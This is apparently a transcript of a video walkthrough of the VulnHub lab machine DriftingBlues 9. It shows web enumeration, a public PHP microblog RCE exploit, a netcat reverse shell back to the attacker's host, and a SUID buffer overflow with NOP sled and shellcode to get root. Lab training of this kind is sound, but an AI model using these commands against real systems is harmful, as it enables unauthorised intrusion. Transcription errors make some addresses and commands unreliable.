Yo, what's going on, guys? In this video, we're going to be doing DriftingBlues 9 from VulnHub. I rate this box about a solid easy, and yeah, hope you guys enjoy. Alright, so like always, we'll start by splitting our terminal here, so we can start by splitting these. I'm going to run a net discover, so run like a net discover from my ZAR 10.0.0.1/24/i80 for my interface. We do get the IP of the box, 10.0.0.124, so we'll just clear this. I'll do mmap. We'll do -sc for default scripts, -sv for enumeration, and we'll scan all ports on the IP. I'm gonna do a simple banner grab on here just to see if port 80 is open. Only just because I don't want to wait for this mmap scan to be finished, right? Doing this, we can visit the IP. Here we do get a DriftingBlues tech. This seems like we do have an admin login. We'll just do like admin, or like admin pass. Or admin 1 2 3, right? Just trying default creds, right? Looking at the URL, we also do see that this is going to a source, which is like a login. Here we could test for like a /etc password for like a local LFI, local file inclusion, and does show that hacking attempt has been detected. We can also like try like filters. We can try like /etc, I think it was /etc password. I think that's how the file worked, but it still doesn't work, right? So we'll just go back. Now we'll do Control U to view the source code. I'll look at this. It does seem like we do have a AP. Let's put this in syntax highlighting. Look at this. We do have a PHP microblog 1.0.1, so we can just search that up. I'll just do like exploit db. Does seem like we do get a exploit for this, which is RCE. So we'll just get the raw data out of this. We'll just we'll go under VulnHub. We'll do mkdir for drifting9. We'll cd into drifting9. We'll get this file, and then we'll like rename this, right? So we'll move this to like exploit.py chmod. We'll do +x for exploit.py. So we'll do Python. I think this is in Python 2, I think. Let's head this out. Yeah, this is in Python 2. So look at this. It does seem like we can use Python or exploit.py and also the target URL, right? So we'll do Python. We'll just do exploit http. We can just copy the IP address. Doing this, seems like we do have it seems like we can execute commands, and we are www data now, right? So we'll see if we have a net count here. So we'll do which nc. It seems like we do have netcat. So I'm gonna start a listener on 44 LNVP on 4444. We'll do netcat 10.0.069 on 4444, and we'll run like we'll execute a bin /sh. We can do ID, and we are www data now, right? So now we do have a better shell than this. So now we'll just export our term is equal to xterm. Something happened. I guess this didn't. Let's run the shell one more time. /bin /sh. Close this out. ID. Okay, so we'll just export our term is equal to xterm. Do this. So let's spawn a tty shell. So we'll just copy this, put this in here. We'll run this like in bin bash, see if there's Python 2 installed, and there is, right? So we'll just cd. We'll do ls-la for home. We'll cd into home. Look at this. We do have a user as Clapton. So if you run this command one more time, you'll see that we do have a database username as Clapton, also a password. See if we can actually use this password. look at this, we do get a long successor, right? So we can clear this. We can check RDs, and we don't have any Docker or LXC, right? So now we'll just do ls minus ls. Let's see if we do have, well, actually it does seem like we do have an SUID for, because of the S, it's also being run by root, right? So we'll cat our node.txt. It does seem like we actually do have to do a buffer overflow. I'm guessing it's for the input since this is a SUID. And this is also a 32-bit BOF. Let's cat our user.txt. And there's our root flag, right? Or our user flag. Do we have Python 3 on here? Python 3. It doesn't seem like we do have Python 3 installed here, right? So we're actually going to start a server in Python 2. So let's actually just, we don't have anything under here. So we'll just do like wget http on this IP address / we'll run this on port 9191 for input, since we're going to be getting input. So since it's Python 2, we can just do Python 2. We'll do -m for simple, I think it's HTTP server, things like this. 9191. Yeah, okay. Now we can get that file. And we do have exploit up, or our input, right? So we'll turn this into executable, and we're going to run this within GDB, right? Okay, so on here, you actually do need to turn off ASLR. If you don't know what ASLR is, it basically just changes the addresses, and it's like it just makes it harder for you to do a buffer overflow, right? So we actually do need to turn that off. So I'll just do echo 0. I think this was under /proc syskernel. Kernel so something random, randomize. I think it was this one, right? Let's cat this out just to make sure this is 0. And we do have ASLR off, right? So we'll do ls minus la. We'll run this in GDB, and we'll just do input. So first things first, we actually need to do find an offset, which is basically like a seg file of where the program crashes, right? So we can go under user share, let's zoom in under user share, Metasploit framework. Under, I think this is under tools, exploits, pattern, create. I'll do -h on here. So we can actually create a length. So I'll do -l for the length, and we'll do like 500, something that's over the buffer. So now we can just do run this within there, and we do get a seg file, right? A segmentation file. We can do, let's see, I think this is pattern offset. We could run a -q on here. I run this, and running this, you'll see that we do get an offset of 171, right? So we'll quit this. We'll end the process again. We're going to be using Python, so we'll just do run. We'll do a $sign or $sign for Python -c. We'll run print, since we do know the offset is, we'll print out A's, and then we'll times it by 171. Since we do know the offset is 171. And also do like times, we'll do, I think we can, yeah, we'll just do plus, and we'll like times this by, we'll do B, so we can actually separate the, because like for A it's going to be like 41 41. I think for B it's like 42 42 when we get the ESP. So we'll delete that. We'll do times, we'll just do times 5, because we don't want to stop at the just 171. We actually want to write more characters, and we can see, it just makes it easier on us, right? We'll do times 5, and for here we actually want to get the, it's going to be x90 because it's going to be the sled hopped, and we'll like times this by 2000. You could calculate the byte size between these, but a good size is also like 2000, which should give us the byte size and give us a seg file, right? So we do a print. We can print A times 171 plus B. I forgot to add a plus here, and this seemed like we do have everything, so we can run this. So this seemed like it did X out correctly. Let's see. Actually, I do have a we can turn that off, or I put an extra pound sign there. Print A171 plus B. You could also do it closer like this. I mean, I think it would be easier, but for me, it's it just makes more sense to have it separated. Plus 5. We can press it on this, and you do see that we get a segmentation file for 42, 42, 42, right? So we can do info R for like the registers, and you do see that we did write the EIP 42, 42, 42, and also do have the EBP 41, 41, 41, right? Okay, so now since we do have that, we actually just do want to see if we can actually overwrite the get some code execution, right? So we'll just do no. Let's try to find our we'll examine the $ESP, and we do have the ESP now, right? So we'll use Python again. We'll run this in Python. We'll do $Python. We'll do -C. We're gonna print this over time. So we'll do print. We'll do A times the, which is gonna be the offset 171. We'll do plus. And in this case, we actually want this to be we actually want to put the ESP in here, right? So for this, I usually just separate it by like E0, CE, FF right there. So I can just put X, it's going to be X E0 backslash X CE backslash FF, or X FF backslash X FF, right? So we do have FF, which is right there, and right there, and then we do have CE, and we also have a E0 and E0, right? So now since we do have that, we actually want to do this, we'll do like X90, which is going to be the sled, knob sled. And we'll like time this by 2000, right? Slide this over. So we do have a Python. We do have print, which is going to be A. We do have our offset, which is it's going to be 171, as you did see it here when we did find the pattern. We do have E0 for our ESP, E0, CE, FF, and FF. And we'll do plus 90, which is going to be the knob sled. We have 90, which is going to allow us to execute our shellcode, right? So now we can just do plus, and then right here we can add a shellcode. We can add our shellcode. So here we can just do, we do notice it's 32-bit, so 32-bit shellcode. I think it's going to take us to shell shock, or shell storm actually. So we'll just copy this, we'll put this, let's quit this. We'll put this into our text editor, we'll delete this, delete that, that. We can copy this, and we can put our shellcode in here, right? Make sure you do close the parentheses. So let's go over this one more time. So we do have Python. We're going to print out A's to the offset, which is 171. We do have our ESP. This is going to be specified backwards, plus 90, which is going to be the knob sled, times 2000. You could calculate the byte size, but in this case 2000 is like a big enough byte size to overwrite to execute our shellcode, so that's good enough. And then we just do have a shellcode. The shellcode, all it's going to do is run a bin/bash or bin/sh, and should give us a shell. If we did run this correctly, this should give us a shell. Let's try to run this. Let's see what we messed up on. So I loaded up GDB again. The reason we didn't get a shell on our machine is because I didn't input the right shellcode, right? So all I did was search up 32-bit shellcode. We can go to our this exploit DB. All I did was just copy this, and basically that's what I have under here, right? I did copy the command, so let's copy this command that we did run before, which is going to give us the seg fault, which is 4242 info R. It does give us 4242 for the registers, and then we do have our shellcode, so we can just copy this. Actually, we'll just delete the shellcode, and we do have our new shellcode here. Just to verify, I'll just do like copy this, and we do have just match that shellcode, right? So go under here, we can just copy this. It should go under there. So now we should copy our shellcode and close this out. So running this, that should give us a shell now. Let me check my ESP. Does seem like we do have that right. FF, CE, or E0, CE, and FFFF. So now we can press enter. And doing this, we do ID, and we are root on our machine now, right? So this is just executed. This is just going to execute on our own machine. Okay, so we can X out of that. I'm just going to start my listener again, so we can get a shell back. We'll just go under seeding to VulnHub. This is drifting 9. I'll just do Python 3 exploit.py. And we can just do HTTP. This the IP address was 10.0.0.124. Okay, so now we can just get a shell again. So we'll do netcat 10.0.069. We'll just do 4444 minus e bin/sh and press enter on that. And now we're www data, right? So let's spawn a TTY shell again. Copy this, put that in there. We'll run this in bin bash. We can do alice minus LA on home. Put that under there, and we are under Hampton, right? So we can just export our term is equal to xterm for this, and we do have our input now, right? Okay, so next we do have input. We do see that this is a SUID, and also input, right? So we actually do need to run this within GDB on this user. If we do which GDB, you do see that we do have a GDB installed, right? So we can actually just run this, and since there is a ASLR enabled, that means the addresses keep changing, right? So that means we actually need to make a for loop so it can actually basically guess the EIP, the address, till it actually gets the segmentation fault, and then does execute our shell code, right? So we'll just do that now. So we'll do GDB, and we'll also run this within input, and you do see that it does load input, right? So we're going to be using the same commands here. So we're going to be using this one here and get the EIP. So we can examine our %sign EIP or ESP. And you do see that this is our ESP, right? Did I run that command right? Yeah. So we do have the ESP, right? So I came up across this article here, which does the same thing. Basically runs a for loop, a 1 to 1000. It just also does find the EIP or ESP, and it runs this, right? So we'll just copy this. We'll run this within, we'll just edit this within here. So here we do know that our Python, our script, our binary is input. We do have Python. And here we want to find our ESP. So for the ESP, we do know that this is 802686 and then BF, right? So we can just copy this. So we'll change this to 80 26 2683 BF, right? So now we do have that. So we can just copy this. Seems like this is right. And try to run this within here. So we can just quit that out. No. So we'll just copy this just in case. Oh, that's weird, erased. Okay, whatever. We'll just copy this. So we can just do Control V. Input, and we do have the right values, 80. 26, 83 and BF, 26, 83 and BF. So we can copy this. We can quit the session. We do have input under there. We can press enter. It doesn't seem like we do get this right. So we'll just run this within these parentheses. Try to run that one more time. We do ID, and we are root ls, and we can cat our root.txt, right? And there is our root flag. I can't really go back since it doesn't run, does it? Yeah, we'll just look at this. So basically, I just put this over there, put parentheses there, so it runs the input. Make sure you do have this over the parentheses. So basically, like right there. We just run that. Run this in a for loop to 1 to 1000. We got the offset. We also get the ESP, which we did input, or which we did get from the GDB. We went to the NOP sled. We're just gonna slide down and execute our shellcode, right, and run a bin sh. And once we do run our bin sh, there is a root flag now, right? We do have ID. Well, guys, that's pretty much in the video. Don't forget to like and subscribe, and I'll catch you guys in the next one. Peace.